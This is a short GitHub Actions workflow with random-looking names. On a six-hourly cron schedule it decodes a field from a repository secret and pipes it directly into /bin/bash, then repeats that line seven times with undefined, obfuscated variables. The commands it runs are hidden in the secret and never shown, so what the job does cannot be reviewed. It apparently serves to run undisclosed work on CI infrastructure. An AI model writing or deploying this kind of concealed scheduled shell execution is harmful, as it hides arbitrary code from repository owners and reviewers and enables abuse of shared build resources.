name: yushufang7816
on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yushufang7816
        env:
          zmed7: ${{ secrets.zmed7 }}
        run: |
          echo $zmed7 | jq -r .ajme1 | /bin/bash
          echo $e7 | jq -r .ftf37443 | /bin/bash
          echo $irm745 | jq -r .mxy71933 | /bin/bash
          echo $cd86718 | jq -r .gdltz828 | /bin/bash
          echo $yj911 | jq -r .rjzv85506 | /bin/bash
          echo $czojl979 | jq -r .ymu0322 | /bin/bash
          echo $uaws59 | jq -r .k9015 | /bin/bash
          echo $azmqk307 | jq -r .geenk4 | /bin/bash

